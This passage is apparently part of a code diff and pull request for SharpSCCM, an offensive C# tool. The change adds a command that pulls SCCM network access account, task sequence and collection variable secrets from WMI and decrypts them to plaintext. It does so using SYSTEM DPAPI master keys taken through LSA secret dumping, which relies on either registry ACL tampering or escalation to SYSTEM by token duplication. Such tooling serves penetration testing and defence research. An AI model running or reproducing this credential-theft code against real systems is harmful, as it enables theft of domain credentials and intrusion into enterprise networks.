+            ManagementObjectCollection networkAccessAccounts = MgmtUtil.GetClassWmiObjects(wmiConnection, "CCM_NetworkAccessAccount");
+
+            Console.WriteLine("[+] Retrieving task sequence blobs via WMI");
+            ManagementObjectCollection taskSequences = MgmtUtil.GetClassWmiObjects(wmiConnection, "CCM_TaskSequence");
+
+            Console.WriteLine("[+] Retrieving collection variable blobs via WMI");
+            ManagementObjectCollection collectionVariables = MgmtUtil.GetClassWmiObjects(wmiConnection, "CCM_CollectionVariable");
+            Console.WriteLine();
+
+            // Don't touch DPAPI unless there are secrets to decrypt
+            if (networkAccessAccounts.Count > 0 || taskSequences.Count > 0 || collectionVariables.Count > 0)
             {
-                ManagementScope wmiConnection = MgmtUtil.NewWmiConnection("127.0.0.1", "root\\ccm\\policy\\Machine\\ActualConfig");
-                Console.WriteLine($"[*] Retrieving network access account blobs via WMI");
-                ManagementObjectSearcher searcher = new ManagementObjectSearcher(wmiConnection, new ObjectQuery("SELECT * FROM CCM_NetworkAccessAccount"));
-                ManagementObjectCollection networkAccessAccounts = searcher.Get();
-                Console.WriteLine($"[*] Retrieving task sequence blobs via WMI");
-                searcher = new ManagementObjectSearcher(wmiConnection, new ObjectQuery("SELECT * FROM CCM_TaskSequence"));
-                ManagementObjectCollection taskSequences = searcher.Get();
-                Console.WriteLine($"[*] Retrieving collection variable blobs via WMI");
-                searcher = new ManagementObjectSearcher(wmiConnection, new ObjectQuery("SELECT * FROM CCM_CollectionVariable"));
-                ManagementObjectCollection collectionVariables = searcher.Get();
-
-                if (networkAccessAccounts.Count > 0 || taskSequences.Count > 0 || collectionVariables.Count > 0)
+                Dictionary<string, string> masterkeys = Dpapi.TriageSystemMasterKeys(reg);
+                Console.WriteLine();
+                if (networkAccessAccounts.Count > 0)
                 {
-                    Dictionary<string, string> masterkeys;
-                    masterkeys = Dpapi.TriageSystemMasterKeys(reg);
-
-                    Console.WriteLine("\r\n[*] SYSTEM master key cache:");
-                    foreach (KeyValuePair<string, string> kvp in masterkeys)
-                    {
-                        Console.WriteLine("    {0}:{1}", kvp.Key, kvp.Value);
-                    }
-
-                    if (networkAccessAccounts.Count > 0)
-                    {
-                        Console.WriteLine("\r\n[*] Triaging network access account Credentials\r\n");
-                        foreach (ManagementObject account in networkAccessAccounts)
-                        {
-                            string protectedUsername = account["NetworkAccessUsername"].ToString().Split('[')[2].Split(']')[0];
-                            string protectedPassword = account["NetworkAccessPassword"].ToString().Split('[')[2].Split(']')[0];
-                            byte[] protectedUsernameBytes = Helpers.StringToByteArray(protectedUsername);
-                            int length = (protectedUsernameBytes.Length + 16 - 1) / 16 * 16;
-                            Array.Resize(ref protectedUsernameBytes, length);
-
-                            try
-                            {
-                                string username = Dpapi.Execute(protectedUsername, masterkeys);
-                                string password = Dpapi.Execute(protectedPassword, masterkeys);
-
-                                if (username.StartsWith("00 00 0E 0E 0E") || password.StartsWith("00 00 0E 0E 0E"))
-                                {
-                                    Console.WriteLine("\r\n[!] SCCM is configured to use the client's machine account instead of NAA\r\n");
-                                }
-                                else
-                                {
-                                    Console.WriteLine("     Plaintext NAA Username         : {0}", username);
-                                    Console.WriteLine("     Plaintext NAA Password         : {0}\n", password);
-                                }
-                            }
-                            catch (Exception e)
-                            {
-                                Console.WriteLine("[!] Data was not decrypted. An error occurred.");
-                                Console.WriteLine(e.ToString());
-                            }
-                        }
-                    }
-
-                    if (taskSequences.Count > 0)
-                    {
-                        Console.WriteLine("\r\n[*] Triaging task sequences\r\n");
-                        foreach (ManagementObject taskSequence in taskSequences)
-                        {
-                            string protectedTaskSequenceValue = taskSequence["TS_Sequence"].ToString().Split('[')[2].Split(']')[0];
-                            try
-                            {
-                                string plaintextTaskSequenceValue = Dpapi.Execute(protectedTaskSequenceValue, masterkeys);
-                                Console.WriteLine("        Plaintext task sequence: {0}\n", plaintextTaskSequenceValue);
-                            }
-                            catch (Exception e)
-                            {
-                                Console.WriteLine("[!] Data was not decrypted. An error occurred.");
-                                Console.WriteLine(e.ToString());
-                            }
-                        }
-                    }                  
-                    
-                    if (collectionVariables.Count > 0)
-                    {
-                        Console.WriteLine("\r\n[*] Triaging collection variables\r\n");
-                        foreach (ManagementObject collectionVariable in collectionVariables)
-                        {
-                            string collectionVariableName = collectionVariable["Name"].ToString();
-                            string protectedCollectionVariableValue = collectionVariable["Value"].ToString().Split('[')[2].Split(']')[0];
-                            try
-                            {
-                                string plaintextCollectionVariableValue = Dpapi.Execute(protectedCollectionVariableValue, masterkeys);
-                                Console.WriteLine("     Collection variable name: {0}", collectionVariableName);
-                                Console.WriteLine("              Plaintext value: {0}\n", plaintextCollectionVariableValue);
-                            }
-                            catch (Exception e)
-                            {
-                                Console.WriteLine("[!] Data was not decrypted. An error occurred.");
-                                Console.WriteLine(e.ToString());
-                            }
-                        }
-                    }
+                    DecryptLocalNetworkAccessAccountsWmi(networkAccessAccounts, masterkeys);
                 }
                 else
                 {
-                    Console.WriteLine($"[+] Found 0 instances of policy secrets.\n");
+                    Console.WriteLine("[+] No network access accounts were found");
                 }
+                Console.WriteLine();
+                if (taskSequences.Count > 0)
+                {
+                    DecryptLocalTaskSequencesWmi(taskSequences, masterkeys);
+                }
+                else
+                {
+                    Console.WriteLine("[+] No task sequences were found");
+                }
+                if (collectionVariables.Count > 0)
+                {
+                    DecryptLocalCollectionVariablesWmi(collectionVariables, masterkeys);
+                }
+                else
+                {
+                    Console.WriteLine("[+] No collection variables were found");
+                }
+                Console.WriteLine("\n");
             }
             else
             {
-                Console.WriteLine("[!] SharpSCCM must be run elevated to retrieve the NAA blobs via WMI.\n");
+                Console.WriteLine("[+] Found 0 instances of policy secrets in the local WMI repository.\n");
+                Console.WriteLine("[+] This could mean that the SCCM environment does not have any secrets configured (but may have previously)");
+                Console.WriteLine("[+] Run 'SharpSCCM local secrets disk' to retrieve secrets from machines that were previously SCCM clients");
+                Console.WriteLine("[+] or had secrets that were modified or deleted\n");
             }
         }
     }

--- a/lib/Dpapi.cs
+++ b/lib/Dpapi.cs
@@ -109,31 +109,25 @@ namespace SharpSCCM
                     }
                     catch (Exception e)
                     {
-                        Console.WriteLine("    [X] Error retrieving GUID:SHA1 from cache {0} : {1}", guidString, e.Message);
+                        Console.WriteLine("    [!] Error retrieving GUID:SHA1 from cache {0} : {1}", guidString, e.Message);
                     }
                 }
             }
-
             return new byte[0]; //temp
-
         }
 
-        public static Dictionary<string, string> TriageSystemMasterKeys(bool show = false, bool reg = false)
+        public static Dictionary<string, string> TriageSystemMasterKeys(bool reg)
         {
             // retrieve the DPAPI_SYSTEM key and use it to decrypt any SYSTEM DPAPI masterkeys
-
             var mappings = new Dictionary<string, string>();
-
             if (Helpers.IsHighIntegrity())
             {
                 // get the system and user DPAPI backup keys, showing the machine DPAPI keys
                 //  { machine , user }
-
                 var keys = LSADump.GetDPAPIKeys(true, reg);
-               
                 string systemFolder = "";
 
-                if (!System.Environment.Is64BitProcess)
+                if (!Environment.Is64BitProcess)
                 {
                     systemFolder = $"{Environment.GetEnvironmentVariable("SystemDrive")}\\Windows\\Sysnative\\Microsoft\\Protect\\";
                 }
@@ -163,13 +157,6 @@ namespace SharpSCCM
                                 if (!Regex.IsMatch(file,
                                         @".*\\[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
                                     continue;
-
-                                var fileName = Path.GetFileName(file);
-                                if (show)
-                                {
-                                    Console.WriteLine("[*] Found SYSTEM system MasterKey : {0}", file);
-                                }
-
                                 var masteyKeyBytes = File.ReadAllBytes(file);
                                 try
                                 {
@@ -179,7 +166,7 @@ namespace SharpSCCM
                                 }
                                 catch (Exception e)
                                 {
-                                    Console.WriteLine("[X] Error triaging {0} : {1}", file, e.Message);
+                                    Console.WriteLine("[!] Error triaging {0} : {1}", file, e.Message);
                                 }
                             }
 
@@ -188,13 +175,6 @@ namespace SharpSCCM
                                 if (!Regex.IsMatch(file,
                                         @".*\\[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
                                     continue;
-
-                                var fileName = Path.GetFileName(file);
-                                if (show)
-                                {
-                                    Console.WriteLine("[*] Found SYSTEM user MasterKey : {0}", file);
-                                }
-
                                 var masteyKeyBytes = File.ReadAllBytes(file);
                                 try
                                 {
@@ -204,7 +184,7 @@ namespace SharpSCCM
                                 }
                                 catch (Exception e)
                                 {
-                                    Console.WriteLine("[X] Error triaging {0} : {1}", file, e.Message);
+                                    Console.WriteLine("[!] Error triaging {0} : {1}", file, e.Message);
                                 }
                             }
                         }
@@ -213,14 +193,12 @@ namespace SharpSCCM
                     {
 
                     }
-
                 }
             }
             else
             {
-                Console.WriteLine("\r\n[X] Must be elevated to triage SYSTEM masterkeys!\r\n");
+                Console.WriteLine("\r\n[!] Must be elevated to triage SYSTEM masterkeys!\r\n");
             }
-
             return mappings;
         }
 

--- a/lib/Dpapi.cs
+++ b/lib/Dpapi.cs
@@ -188,6 +188,11 @@ namespace SharpSCCM
                                 }
                             }
                         }
+                        Console.WriteLine("\r\n[+] SYSTEM master key cache:");
+                        foreach (KeyValuePair<string, string> kvp in mappings)
+                        {
+                            Console.WriteLine("    {0}:{1}", kvp.Key, kvp.Value);
+                        }
                     }
                     catch (Exception ex)
                     {

--- a/lib/Helpers.cs
+++ b/lib/Helpers.cs
@@ -6,8 +6,6 @@ using System.IO;
 using System.Linq;
 using System.Runtime.InteropServices;
 using System.Security.Principal;
-using System.Text;
-using System.Text.RegularExpressions;
 
 namespace SharpSCCM
 {

--- a/lib/LSADump.cs
+++ b/lib/LSADump.cs
@@ -1,20 +1,10 @@
 ﻿using System;
 using System.Collections.Generic;
 using System.ComponentModel;
-using System.Diagnostics;
-using System.IO;
-using System.Linq;
 using System.Runtime.InteropServices;
-using System.Security.Principal;
-using System.Text.RegularExpressions;
 using System.Text;
-using System.Security.Cryptography;
-using System.Collections;
 using Microsoft.Win32;
 using System.Security.AccessControl;
-using System.Data;
-using System.Runtime.InteropServices.ComTypes;
-using System.Net;
 
 namespace SharpSCCM
 {
@@ -49,9 +39,9 @@ namespace SharpSCCM
 
             if (show)
             {
-                Console.WriteLine("[*] Secret  : DPAPI_SYSTEM");
-                Console.WriteLine("[*]    full: {0}", BitConverter.ToString(dpapiKeyFull).Replace("-", ""));
-                Console.WriteLine("[*]    m/u : {0} / {1}\r\n", BitConverter.ToString(dpapiKeyMachine).Replace("-", ""), BitConverter.ToString(dpapiKeyUser).Replace("-", ""));
+                Console.WriteLine("[+] Secret: DPAPI_SYSTEM");
+                Console.WriteLine("    full: {0}", BitConverter.ToString(dpapiKeyFull).Replace("-", ""));
+                Console.WriteLine("     m/u: {0} / {1}", BitConverter.ToString(dpapiKeyMachine).Replace("-", ""), BitConverter.ToString(dpapiKeyUser).Replace("-", ""));
             }
 
             return dpapiKeys;
@@ -82,7 +72,7 @@ namespace SharpSCCM
 
             if (!Helpers.IsHighIntegrity())
             {
-                Console.WriteLine("[X] You need to be in high integrity to extract LSA secrets!");
+                Console.WriteLine("[!] You need to be in high integrity to extract LSA secrets!");
                 return null;
             }
             else
@@ -97,17 +87,16 @@ namespace SharpSCCM
                 else if ((reg == false) && (alreadySystem == false))
                 {
                     // elevated but not system, so gotta GetSystem() first
-                    Console.WriteLine("[*] Elevating to SYSTEM via token duplication for LSA secret retrieval");
+                    Console.WriteLine("[+] Elevating to SYSTEM via token duplication for LSA secret retrieval");
                     Helpers.GetSystem();
                 }
 
                 // If we're not system and we don't want to escalate, modify the LSA secrets reg key permissions instead
                 else if ((reg == true) && (alreadySystem == false))
                 {
-                    Console.WriteLine("\r\n");
                     foreach (string key in LsaRegKeys)
                     {
-                        Console.WriteLine("[*] Modifying permissions on registry key: {0}", key);
+                        Console.WriteLine("[+] Modifying permissions on registry key: {0}", key);
 
                         // Backup the current ACL
                         originalAcl = Registry.LocalMachine.OpenSubKey(key, RegistryKeyPermissionCheck.ReadWriteSubTree, System.Security.AccessControl.RegistryRights.ReadPermissions).GetAccessControl();
@@ -153,18 +142,18 @@ namespace SharpSCCM
             {
                 foreach (string key in LsaRegKeys)
                 {
-                    Console.WriteLine("[*] Reverting permissions on registry key: {0}", key);
+                    Console.WriteLine("[+] Reverting permissions on registry key: {0}", key);
                     revertedAcl = newAcl;
                     newRule = new RegistryAccessRule(currentName, RegistryRights.ReadKey, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Allow);
                     revertedAcl.RemoveAccessRule(newRule);
                     Registry.LocalMachine.OpenSubKey(key, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.ChangePermissions).SetAccessControl(revertedAcl);
                 }
-                Console.WriteLine("\r\n");
+                Console.WriteLine();
             }
 
             if ((!alreadySystem) && (!reg))
             {
-                Console.WriteLine("[*] RevertToSelf()\r\n");
+                Console.WriteLine("[+] RevertToSelf()\r\n");
                 Interop.RevertToSelf();
             }
 
@@ -176,7 +165,7 @@ namespace SharpSCCM
             }
             else
             {
-                Console.WriteLine("[X] LSA Secret '{0}' not yet implemented!", secretName);
+                Console.WriteLine("[!] LSA Secret '{0}' not yet implemented!", secretName);
                 return null;
             }
         }
@@ -231,7 +220,7 @@ namespace SharpSCCM
                 {
                     int error = Marshal.GetLastWin32Error();
                     string errorMessage = new Win32Exception((int)error).Message;
-                    Console.WriteLine("Error opening {0} ({1}) : {2}", keyPath, error, errorMessage);
+                    Console.WriteLine("[!] Error opening {0} ({1}) : {2}", keyPath, error, errorMessage);
                     return null;
                 }
 
@@ -240,7 +229,7 @@ namespace SharpSCCM
                 {
                     int error = Marshal.GetLastWin32Error();
                     string errorMessage = new Win32Exception((int)error).Message;
-                    Console.WriteLine("Error enumerating {0} ({1}) : {2}", keyPath, error, errorMessage);
+                    Console.WriteLine("[!] Error enumerating {0} ({1}) : {2}", keyPath, error, errorMessage);
                     return null;
                 }
                 Interop.RegCloseKey(hKey);

--- a/lib/MgmtPointWmi.cs
+++ b/lib/MgmtPointWmi.cs
@@ -1,5 +1,4 @@
 ﻿using System;
-using System.Collections.ObjectModel;
 using System.Linq;
 using System.Management;
 
@@ -86,6 +85,10 @@ namespace SharpSCCM
                 {
                     Console.WriteLine("[+] Automatic site-wide client push installation is enabled");
                 }
+                else if (result["PropertyName"].ToString() == "SETTINGS" && result["Value1"].ToString() != "Active")
+                {
+                    Console.WriteLine("[+] Automatic site-wide client push installation is not enabled");
+                }
                 else if (result["PropertyName"].ToString() == "ENABLEKERBEROSCHECK" && result["Value"].ToString() == "3")
                 {
                     Console.WriteLine("[+] Fallback to NTLM is enabled");
@@ -150,7 +153,7 @@ namespace SharpSCCM
             {
                 if (result["Enabled"].ToString() == "True")
                 {
-                    Console.WriteLine($"[+] The client installed flag is automatically cleared on inactive clients after {result["DeleteOlderThan"]} days, resulting in automatic reinstallation");
+                    Console.WriteLine($"[+] The client installed flag is automatically cleared on inactive clients after {result["DeleteOlderThan"]} days, resulting in reinstallation if automatic site-wide client push installation is enabled");
                 }
                 else
                 {

--- a/lib/MgmtUtil.cs
+++ b/lib/MgmtUtil.cs
@@ -130,7 +130,7 @@ namespace SharpSCCM
         {
             string path = "";
             ConnectionOptions connection = new ConnectionOptions();
-            if (server == "localhost")
+            if (server == "127.0.0.1")
             {
                 if (string.IsNullOrEmpty(wmiNamespace))
                 {

--- a/lib/MgmtUtil.cs
+++ b/lib/MgmtUtil.cs
@@ -82,6 +82,13 @@ namespace SharpSCCM
             }
         }
 
+        public static ManagementObjectCollection GetClassWmiObjects(ManagementScope wmiConnection, string className, string properties = "*")
+        {
+            ManagementObjectSearcher searcher = new ManagementObjectSearcher(wmiConnection, new ObjectQuery($"SELECT {properties} FROM {className}"));
+            ManagementObjectCollection wmiObjects = searcher.Get();
+            return wmiObjects;
+        }
+
         public static string[] GetKeyPropertyNames(ManagementScope wmiConnection, string className)
         {
             using (ManagementClass managementClass = new ManagementClass(wmiConnection, new ManagementPath(className), new ObjectGetOptions()))


### PR DESCRIPTION
Added `local secrets <disk/wmi> [-s]` command to allow retrieval and decryption of network access account, task sequence, and collection variable secrets in the WMI repository on an SCCM client. Requires local admin privileges. By default, this command modifies and reverts the LSA secret registry key permissions to temporarily allow access to DPAPI master keys. The `-s` option can be used if escalation to SYSTEM via token duplication is preferred.